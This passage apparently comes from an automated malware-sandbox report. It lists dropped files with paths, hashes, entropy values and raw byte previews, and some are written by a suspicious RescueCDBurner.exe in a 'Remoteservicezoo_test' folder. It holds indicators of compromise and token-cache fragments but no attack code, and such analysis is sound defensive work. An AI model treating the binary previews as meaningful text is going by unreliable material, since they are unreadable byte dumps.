                                                                                                                                                                Preview:topTraffic_638004170464094982

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):9
                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:uriCache_

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):179
                                                                                                                                                                Entropy (8bit):5.017293032290951
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTJsR4n:YWLSGTt1o9LuLgfGBPAzkVj/T8l6i
                                                                                                                                                                MD5:4BB4FDE2964E956936D0B0DE09D0AB2A
                                                                                                                                                                SHA1:3FF74CF36FC480FD9460AC660EA41DA643DBD83D
                                                                                                                                                                SHA-256:63402D238C60917FF1F9B355428A25A2D962FDC0C2B07DC503BF5D48FB48F3E8
                                                                                                                                                                SHA-512:CA64BA4696C30E87153CF99AC322396EEE312CB108C7B30B338D794E0775ACB7F3CA0F2B5955FC8F5996BBDA508C83609412CA6224B711AF983C159992E4A64B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736530952120486}]}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):86
                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b089c93a-69a8-4a57-b558-16f5bf315f9b.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e58daf4c-8a08-48bd-8faa-9f9e8bda2e47.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):45983
                                                                                                                                                                Entropy (8bit):6.087920565418126
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:UMkbJrT8IeQc5dayzKKGf4YMZPVajeQuuHXcQSfMCios7DRo+yM/42cRaLMos77:UMk1rT8H1aVMZ+H9Fos7VLyMV/YosH
                                                                                                                                                                MD5:AABD00AE30BEEADCE4D1B09609AA6978
                                                                                                                                                                SHA1:F4EBCD4477F1E9712A2423E29D299DC723EB3A8C
                                                                                                                                                                SHA-256:A97A550ACE913F84FA5EF18065BE2B29B42501A6D1709416C847E924356840AA
                                                                                                                                                                SHA-512:744669B473412716E31B21EA8543BB8EA79850E683E1889D80C7F6989E46FB301C286FDE50E36B43B16E5A02EFFEDC2B9B106CA3B6AD463FA66B0213ED379CAF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"06756165-738a-4eac-aa05-b3426f7d05eb"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                Entropy (8bit):3.857378170510866
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:uiTrlKxrgxGxl9Il8uTy3tp0mzvQ7bShRBH0eYq8vaAhyRd1rc:m3YQb0mDQ7MROJvaAEy
                                                                                                                                                                MD5:CCA068D01BF7FF6954A759F6510B1866
                                                                                                                                                                SHA1:F6A5696D1077A157581D1AA3572D9BB7DB3BA8DD
                                                                                                                                                                SHA-256:1266CDA6B8EA4EEF1169B2CFF64C40566652443767306ABD148118C03E3D090F
                                                                                                                                                                SHA-512:AA7D3F5A7F1FE1983F89D26042A74BE74F6DFABA3045244B505503B83473B80ADDDFCAE444C56E9738C5763848349FE1113EFFAE2B4CC0760A33A6B45B1906A4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.N.J.6.t.6.R.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.y.Y.Z.K.8.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                Entropy (8bit):4.000081803892654
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:uiTrlKxEx2JxD9Il8uTyQV1aQp3npdZn1ryIc9+aJTCZmSHXvdYhrtB0NQ+AN3K6:8YVv3nTZnxGPQlfG/+AN3K3XGC/W
                                                                                                                                                                MD5:0035AD3D00E16C475D11C3FFC7B58257
                                                                                                                                                                SHA1:16DCACFE5CC0610752877B88D7756B4BF3BE79B0
                                                                                                                                                                SHA-256:F4454DC10C306A662E7F34643489C9B2D2A4D89704256A67351E37FA8C48EA52
                                                                                                                                                                SHA-512:C76DD673708804E816130A5286FB1E7E5EF54E0C88A6004132EB1C9CB9EDA972221FDA7569E9786FAA3BBD218F4B998A931D250B00F7C88204E8851054A0CAF5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".l.i.j.n.n.J.x.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.y.Y.Z.K.8.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                Entropy (8bit):3.91398112739423
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7xcbxl9Il8uTyvCN0NYRBRT53dtpGPQKeT+YnglRd/vc:a8YdN0NgRt3dDd1T/glA
                                                                                                                                                                MD5:E94B70E23FF54C9DA2B00F8A7EE8D18A
                                                                                                                                                                SHA1:4532A45BEA1340E7D815DC25720CBF077B57F4F9
                                                                                                                                                                SHA-256:FCA0F808D3B4788C8C5550131FA94339560B40D611BD06222DD185AE8A54D1C1
                                                                                                                                                                SHA-512:218E7B3231162F73FFEE394C5611FE3BB642B82F60552048C0FCDD11E75E5B7A14D5A7E9E7C208B143C08975C4C61A5DF8D881D384019D1F47C0286B9B3FD510
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".s.S.j.d.z.W.2.B.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.y.Y.Z.K.8.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\156c1e6c-5e72-48e1-bfb2-2baa2ed5a0b3.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\305d320e

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):5622661
                                                                                                                                                                Entropy (8bit):7.712440406758562
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:TdcsjAcC3kmUPeLv6p5DBkkIKBHB3D4CW0a+Tl3rRhNCMeN:xcxcC3YW769eKBSyV51C9
                                                                                                                                                                MD5:BB0FCBB4457157A536B2F02B3C7D759D
                                                                                                                                                                SHA1:AFA4F808E8CF6749782FBAFB5C7459E105A2E529
                                                                                                                                                                SHA-256:91F53082C94277B434A1D442BC154034747486E7B77EE4EC20C29961683AC487
                                                                                                                                                                SHA-512:133D67D8029533548ECEB69C21C8E747ED130D3420AB8DDBB007CACFA542B817EF0F34409DD43F5EE546F623286DEC97693C827495DBD65D6669579875499562
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..U^...........7..;-.. ...::..'...5,...;......3,..'...5,..$^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^...0..=?...;..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^...,.. ;..'*..7;..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^.......{..==..'1..z.......9;..&5..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..zn..di..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\382dedee-3705-4d3c-b01c-aaec81b4f9f4.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\40a41eac

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):5622661
                                                                                                                                                                Entropy (8bit):7.712440057893304
                                                                                                                                                                Encrypted:false
